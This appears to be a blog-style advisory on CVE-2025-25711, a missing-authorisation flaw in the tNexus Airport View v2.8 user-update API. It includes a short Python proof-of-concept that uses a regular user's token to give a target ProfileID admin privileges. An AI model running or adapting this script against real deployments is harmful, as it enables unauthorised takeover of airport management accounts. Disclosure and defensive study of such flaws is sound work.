CVE-2025-25711 - Privilege Escalation in dtp.ae tNexus Airport View v2.8 via ProfileID Injection

---

Intro

A new vulnerability, CVE-2025-25711, has been discovered in the popular airport management software, dtp.ae tNexus Airport View v2.8. The flaw lets a remote attacker gain elevated privileges simply by manipulating the ProfileID parameter in requests to a specific API endpoint.

This post breaks down what the issue is, how it can be exploited, and how to defend your systems. The information and code samples below are written simply and exclusively for this post.

What’s the Problem?

dtp.ae tNexus Airport View is used globally by airports for real-time flight info and staff management. Unfortunately, the web API in version 2.8 lacks proper checks on who can update user profiles.

To update user data, the API at /tnexus/rest/admin/updateUser uses a field called ProfileID to identify which user profile to change. It blindly trusts that the caller has permission to update any profile identifier they send—there are no access controls. This means attackers can change the details (like privileges) of any user, including admins.

You do *not* need valid admin credentials. Anyone who can access the API can exploit this.

The Vulnerable Endpoint

- URL: POST /tnexus/rest/admin/updateUser

How the Attack Works

Suppose you are logged in as a regular user (or exploiting a weak API authentication), then send a request to update an account with the ProfileID of an admin. The server will process your request, change admin details, or even give your account admin rights.

Let’s see how an attacker could do this

import requests

# Replace these with real values
api_base = "https://airport.example.com/tnexus/rest/admin/updateUser";
attacker_token = "regular_user_session_token"  # Obtained from login, session hijacking, etc.

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {attacker_token}"
}

data = {
    "ProfileID": 1,                 # 1 = Admin's ID (guess/brute force/list)
    "UserPrivileges": "admin",      # Grant admin privileges
    "OtherField": "UpdatedValue"
}

response = requests.post(api_base, json=data, headers=headers)

if response.status_code == 200:
    print("[+] Admin account updated! You now have admin rights.")
else:
    print("[-] Exploit failed:", response.text)

> Note: The critical part is that the API only looks at the ProfileID, without checking if the requester should be able to update it.

Prevention

Patch Status: As of now, no official fix is available from dtp.ae.
(Official site: https://dtp.ae/airport-view)
Keep monitoring their news and downloads page for updates.

Exploit Author: [Unknown at publication]

- Original Advisory: (Coming soon as public disclosure is recent; check https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25711)
- Vendor: dtp.ae
- More Background: Airport View product page

Summary

CVE-2025-25711 is a critical and dangerously easy privilege escalation in tNexus Airport View v2.8. If you run this software, block external access immediately and monitor for updates from the vendor. Remember, always check the permissions at the *server side* before letting users change accounts!

Timeline

Published on: 03/12/2025 16:15:23 UTC